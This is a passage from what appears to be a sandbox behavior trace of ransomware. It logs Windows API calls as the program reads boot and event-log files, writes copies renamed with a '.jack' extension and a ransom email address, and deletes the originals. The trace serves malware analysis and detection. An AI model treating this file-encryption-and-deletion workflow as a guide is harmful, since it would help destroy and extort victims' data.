(lpString1=".ttf", lpString2=".jack") returned 1 [0205.365] lstrlenW (lpString="msyh_boot.ttf") returned 13 [0205.365] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0205.365] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=156245) returned 1 [0205.365] CloseHandle (hObject=0x438) returned 1 [0205.365] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf")) returned 0x20 [0205.365] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msyh_boot.ttf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.365] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.365] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0205.365] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0205.365] lstrlenW (lpString=".doc") returned 4 [0205.365] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0205.365] lstrlenW (lpString=".docx") returned 5 [0205.365] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0205.366] lstrlenW (lpString=".pdf") returned 4 [0205.366] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0205.366] lstrlenW (lpString=".xls") returned 4 [0205.366] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0205.366] lstrlenW (lpString=".xlsx") returned 5 [0205.366] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0205.366] lstrlenW (lpString=".ppt") returned 4 [0205.366] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0205.366] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0205.366] lstrlenW (lpString=".zip") returned 4 [0205.366] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0205.366] lstrlenW (lpString=".rar") returned 4 [0205.366] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0205.366] lstrlenW (lpString=".bz2") returned 4 [0205.366] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0205.366] lstrlenW (lpString=".7z") returned 3 [0205.366] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0205.366] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0205.366] lstrlenW (lpString=".dbf") returned 4 [0205.366] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0205.384] SetFileAttributesW (lpFileName="C:\\bootmgr", dwFileAttributes=0x26) returned 0 [0205.384] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.386] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.386] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.386] CreateFileW (lpFileName="C:\\BOOTNXT.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\bootnxt.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0205.386] GetLastError () returned 0x0 [0205.386] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x1, lpOverlapped=0x0) returned 1 [0205.387] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x10, lpOverlapped=0x0) returned 1 [0205.388] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.388] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0xe2, lpOverlapped=0x0) returned 1 [0205.389] SetEndOfFile (hFile=0x424) returned 1 [0205.389] CloseHandle (hObject=0x424) returned 1 [0205.393] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.393] SetEndOfFile (hFile=0x418) returned 1 [0205.394] CloseHandle (hObject=0x418) returned 1 [0205.394] SetFileAttributesW (lpFileName="C:\\BOOTNXT.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x26) returned 1 [0205.395] DeleteFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt")) returned 1 [0205.395] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0205.395] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0205.395] lstrlenW (lpString=".doc") returned 4 [0205.395] lstrcmpiW (lpString1=".doc", lpString2="TNXT") returned -1 [0205.395] lstrlenW (lpString=".docx") returned 5 [0205.395] lstrcmpiW (lpString1=".docx", lpString2="OTNXT") returned -1 [0205.395] lstrlenW (lpString=".pdf") returned 4 [0205.395] lstrcmpiW (lpString1=".pdf", lpString2="TNXT") returned -1 [0205.395] lstrlenW (lpString=".xls") returned 4 [0205.395] lstrcmpiW (lpString1=".xls", lpString2="TNXT") returned -1 [0205.395] lstrlenW (lpString=".xlsx") returned 5 [0205.395] lstrcmpiW (lpString1=".xlsx", lpString2="OTNXT") returned -1 [0205.396] lstrlenW (lpString=".ppt") returned 4 [0205.396] lstrcmpiW (lpString1=".ppt", lpString2="TNXT") returned -1 [0205.396] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0205.396] lstrlenW (lpString=".zip") returned 4 [0205.396] lstrcmpiW (lpString1=".zip", lpString2="TNXT") returned -1 [0205.396] lstrlenW (lpString=".rar") returned 4 [0205.396] lstrcmpiW (lpString1=".rar", lpString2="TNXT") returned -1 [0205.396] lstrlenW (lpString=".bz2") returned 4 [0205.396] lstrcmpiW (lpString1=".bz2", lpString2="TNXT") returned -1 [0205.396] lstrlenW (lpString=".7z") returned 3 [0205.396] lstrcmpiW (lpString1=".7z", lpString2="NXT") returned -1 [0205.396] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0205.396] lstrlenW (lpString=".dbf") returned 4 [0205.396] lstrcmpiW (lpString1=".dbf", lpString2="TNXT") returned -1 [0205.396] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0205.396] lstrlenW (lpString=".1cd") returned 4 [0205.396] lstrcmpiW (lpString1=".1cd", lpString2="TNXT") returned -1 [0205.396] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0205.396] lstrlenW (lpString=".jpg") returned 4 [0205.396] lstrcmpiW (lpString1=".jpg", lpString2="TNXT") returned -1 [0205.396] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0205.396] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0205.396] lstrlenW (lpString=".doc") returned 4 [0205.396] lstrcmpiW (lpString1=".doc", lpString2="TNXT") returned -1 [0205.396] lstrlenW (lpString=".docx") returned 5 [0205.396] lstrcmpiW (lpString1=".docx", lpString2="OTNXT") returned -1 [0205.396] lstrlenW (lpString=".pdf") returned 4 [0205.396] lstrcmpiW (lpString1=".pdf", lpString2="TNXT") returned -1 [0205.397] lstrlenW (lpString=".xls") returned 4 [0205.397] lstrcmpiW (lpString1=".xls", lpString2="TNXT") returned -1 [0205.397] lstrlenW (lpString=".xlsx") returned 5 [0205.397] lstrcmpiW (lpString1=".xlsx", lpString2="OTNXT") returned -1 [0205.397] lstrlenW (lpString=".ppt") returned 4 [0205.397] lstrcmpiW (lpString1=".ppt", lpString2="TNXT") returned -1 [0205.397] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0205.397] lstrlenW (lpString=".zip") returned 4 [0205.397] lstrcmpiW (lpString1=".zip", lpString2="TNXT") returned -1 [0205.397] lstrlenW (lpString=".rar") returned 4 [0205.397] lstrcmpiW (lpString1=".rar", lpString2="TNXT") returned -1 [0205.397] lstrlenW (lpString=".bz2") returned 4 [0205.397] lstrcmpiW (lpString1=".bz2", lpString2="TNXT") returned -1 [0205.397] lstrlenW (lpString=".7z") returned 3 [0205.397] lstrcmpiW (lpString1=".7z", lpString2="NXT") returned -1 [0205.397] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0205.397] lstrlenW (lpString=".dbf") returned 4 [0205.397] lstrcmpiW (lpString1=".dbf", lpString2="TNXT") returned -1 [0205.397] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0205.397] lstrlenW (lpString=".1cd") returned 4 [0205.397] lstrcmpiW (lpString1=".1cd", lpString2="TNXT") returned -1 [0205.397] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0205.397] lstrlenW (lpString=".jpg") returned 4 [0205.397] lstrcmpiW (lpString1=".jpg", lpString2="TNXT") returned -1 [0205.398] lstrcmpiW (lpString1=".sys", lpString2=".jack") returned 1 [0205.398] lstrlenW (lpString="hiberfil.sys") returned 12 [0205.398] CreateFileW (lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.398] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0205.398] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0205.398] lstrlenW (lpString=".doc") returned 4 [0205.398] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0205.398] lstrlenW (lpString=".docx") returned 5 [0205.398] lstrcmpiW (lpString1=".docx", lpString2="l.sys") returned -1 [0205.398] lstrlenW (lpString=".pdf") returned 4 [0205.398] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0205.398] lstrlenW (lpString=".xls") returned 4 [0205.398] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0205.398] lstrlenW (lpString=".xlsx") returned 5 [0205.398] lstrcmpiW (lpString1=".xlsx", lpString2="l.sys") returned -1 [0205.398] lstrlenW (lpString=".ppt") returned 4 [0205.398] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0205.398] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0205.398] lstrlenW (lpString=".zip") returned 4 [0205.398] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0205.398] lstrlenW (lpString=".rar") returned 4 [0205.398] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0205.398] lstrlenW (lpString=".bz2") returned 4 [0205.398] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0205.398] lstrlenW (lpString=".7z") returned 3 [0205.399] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0205.399] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0205.399] lstrlenW (lpString=".dbf") returned 4 [0205.399] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0205.399] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0205.399] lstrlenW (lpString=".1cd") returned 4 [0205.399] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0205.399] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0205.399] lstrlenW (lpString=".jpg") returned 4 [0205.399] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0205.399] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0205.399] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0205.399] lstrlenW (lpString=".doc") returned 4 [0205.399] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0205.399] lstrlenW (lpString=".docx") returned 5 [0205.399] lstrcmpiW (lpString1=".docx", lpString2="l.sys") returned -1 [0205.399] lstrlenW (lpString=".pdf") returned 4 [0205.399] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0205.399] lstrlenW (lpString=".xls") returned 4 [0205.399] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0205.399] lstrlenW (lpString=".xlsx") returned 5 [0205.400] lstrcmpiW (lpString1=".xlsx", lpString2="l.sys") returned -1 [0205.400] lstrlenW (lpString=".ppt") returned 4 [0205.400] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0205.400] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0205.400] lstrlenW (lpString=".zip") returned 4 [0205.400] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0205.400] lstrlenW (lpString=".rar") returned 4 [0205.400] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0205.400] lstrlenW (lpString=".bz2") returned 4 [0205.400] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0205.400] lstrlenW (lpString=".7z") returned 3 [0205.400] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0205.400] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0205.400] lstrlenW (lpString=".dbf") returned 4 [0205.400] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0205.400] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0205.400] lstrlenW (lpString=".1cd") returned 4 [0205.400] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0205.400] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0205.400] lstrlenW (lpString=".jpg") returned 4 [0205.400] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0205.400] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0205.400] lstrlenW (lpString="Application.evtx") returned 16 [0205.400] CreateFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0205.431] GetFileSizeEx (in: hFile=0x418, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0205.431] CloseHandle (hObject=0x418) returned 1 [0205.431] GetFileAttributesW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx")) returned 0x20 [0205.431] GetFileAttributesW (lpFileName="C:\\Logs\\Application.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\application.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.431] CreateFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0205.431] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.432] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.432] CreateFileW (lpFileName="C:\\Logs\\Application.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\application.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0205.432] GetLastError () returned 0x0 [0205.432] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0205.455] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0205.501] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.501] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0xf4, lpOverlapped=0x0) returned 1 [0205.501] SetEndOfFile (hFile=0x424) returned 1 [0205.501] CloseHandle (hObject=0x424) returned 1 [0205.503] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.503] SetEndOfFile (hFile=0x418) returned 1 [0205.504] CloseHandle (hObject=0x418) returned 1 [0205.504] SetFileAttributesW (lpFileName="C:\\Logs\\Application.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0205.505] DeleteFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx")) returned 1 [0205.505] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0205.505] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0205.505] lstrlenW (lpString=".doc") returned 4 [0205.505] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.505] lstrlenW (lpString=".docx") returned 5 [0205.505] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.505] lstrlenW (lpString=".pdf") returned 4 [0205.505] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.505] lstrlenW (lpString=".xls") returned 4 [0205.505] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.505] lstrlenW (lpString=".xlsx") returned 5 [0205.505] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.505] lstrlenW (lpString=".ppt") returned 4 [0205.505] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.505] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0205.505] lstrlenW (lpString=".zip") returned 4 [0205.505] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.505] lstrlenW (lpString=".rar") returned 4 [0205.505] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.505] lstrlenW (lpString=".bz2") returned 4 [0205.505] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.505] lstrlenW (lpString=".7z") returned 3 [0205.506] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.506] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0205.506] lstrlenW (lpString=".dbf") returned 4 [0205.506] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.506] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0205.506] lstrlenW (lpString=".1cd") returned 4 [0205.506] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.506] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0205.506] lstrlenW (lpString=".jpg") returned 4 [0205.506] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.506] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0205.506] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0205.506] lstrlenW (lpString=".doc") returned 4 [0205.506] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.506] lstrlenW (lpString=".docx") returned 5 [0205.506] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.506] lstrlenW (lpString=".pdf") returned 4 [0205.506] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.506] lstrlenW (lpString=".xls") returned 4 [0205.506] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.506] lstrlenW (lpString=".xlsx") returned 5 [0205.506] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.506] lstrlenW (lpString=".ppt") returned 4 [0205.506] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.506] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0205.506] lstrlenW (lpString=".zip") returned 4 [0205.506] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.506] lstrlenW (lpString=".rar") returned 4 [0205.506] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.506] lstrlenW (lpString=".bz2") returned 4 [0205.506] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.506] lstrlenW (lpString=".7z") returned 3 [0205.506] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.506] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0205.506] lstrlenW (lpString=".dbf") returned 4 [0205.506] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.507] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0205.507] lstrlenW (lpString=".1cd") returned 4 [0205.507] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.507] lstrlenW (lpString="C:\\Logs\\Application.evtx") returned 24 [0205.507] lstrlenW (lpString=".jpg") returned 4 [0205.507] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.507] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0205.507] lstrlenW (lpString="HardwareEvents.evtx") returned 19 [0205.507] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0205.516] GetFileSizeEx (in: hFile=0x418, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0205.516] CloseHandle (hObject=0x418) returned 1 [0205.516] GetFileAttributesW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx")) returned 0x20 [0205.516] GetFileAttributesW (lpFileName="C:\\Logs\\HardwareEvents.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\hardwareevents.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.516] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0205.517] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.517] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.517] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\hardwareevents.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0205.517] GetLastError () returned 0x0 [0205.517] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0205.519] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0205.521] ReadFile (in: hFile=0x418, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.521] WriteFile (in: hFile=0x424, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0xfa, lpOverlapped=0x0) returned 1 [0205.521] SetEndOfFile (hFile=0x424) returned 1 [0205.521] CloseHandle (hObject=0x424) returned 1 [0205.776] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.776] SetEndOfFile (hFile=0x418) returned 1 [0205.778] CloseHandle (hObject=0x418) returned 1 [0205.778] SetFileAttributesW (lpFileName="C:\\Logs\\HardwareEvents.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0205.778] DeleteFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx")) returned 1 [0205.778] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0205.778] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0205.778] lstrlenW (lpString=".doc") returned 4 [0205.778] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.779] lstrlenW (lpString=".docx") returned 5 [0205.779] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.779] lstrlenW (lpString=".pdf") returned 4 [0205.779] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.779] lstrlenW (lpString=".xls") returned 4 [0205.779] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.779] lstrlenW (lpString=".xlsx") returned 5 [0205.779] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.779] lstrlenW (lpString=".ppt") returned 4 [0205.779] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.779] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0205.779] lstrlenW (lpString=".zip") returned 4 [0205.779] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.779] lstrlenW (lpString=".rar") returned 4 [0205.779] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.779] lstrlenW (lpString=".bz2") returned 4 [0205.779] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.779] lstrlenW (lpString=".7z") returned 3 [0205.779] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.779] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0205.779] lstrlenW (lpString=".dbf") returned 4 [0205.779] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.779] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0205.779] lstrlenW (lpString=".1cd") returned 4 [0205.779] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.779] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0205.779] lstrlenW (lpString=".jpg") returned 4 [0205.779] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.780] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 